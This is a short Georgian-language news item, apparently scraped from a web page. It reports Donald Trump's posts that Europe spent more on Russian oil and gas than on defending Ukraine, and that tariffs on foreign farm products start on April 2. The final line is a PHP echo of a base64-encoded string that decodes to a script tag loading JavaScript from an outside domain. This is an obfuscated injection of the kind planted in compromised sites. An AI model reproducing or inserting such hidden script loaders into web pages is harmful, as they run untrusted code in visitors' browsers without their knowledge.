tube
ავერსი jaluzi

ევროპამ რუსული ნავთობისა და გაზის შესაძენად უფრო მეტი ფული დახარჯა, ვიდრე უკრაინის დასაცავად, - ამის შესახებ აშშ-ის პრეზიდენტი, დონალდ ტრამპი Truth Social-ზე წერს.

„ევროპამ რუსული ნავთობისა და გაზის შესაძენად უფრო მეტი ფული დახარჯა, ვიდრე უკრაინის დასაცავად. გაცილებით მეტი“, - წერს დონალდ ტრამპი.

ასევე, აშშ-ის პრეზიდენტი აცხადებს, რომ „უცხოურ“ სოფლის მეურნეობის პროდუქტებზე ტარიფები ძალაში მომავალი თვიდან შევა.

„აშშ-ის შესანიშნავ ფერმერებს: მოემზადეთ, რათა ბევრი სოფლის მეურნეობის პროდუქტის წარმოება დაიწყოთ, რომელიც აშშ-ში გაიყიდება. უცხოურ პროდუქტებზე ტარიფები 2 აპრილიდან ამოქმედდება!“, - აღნიშნავს აშშ-ის პრეზიდენტი.

87
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");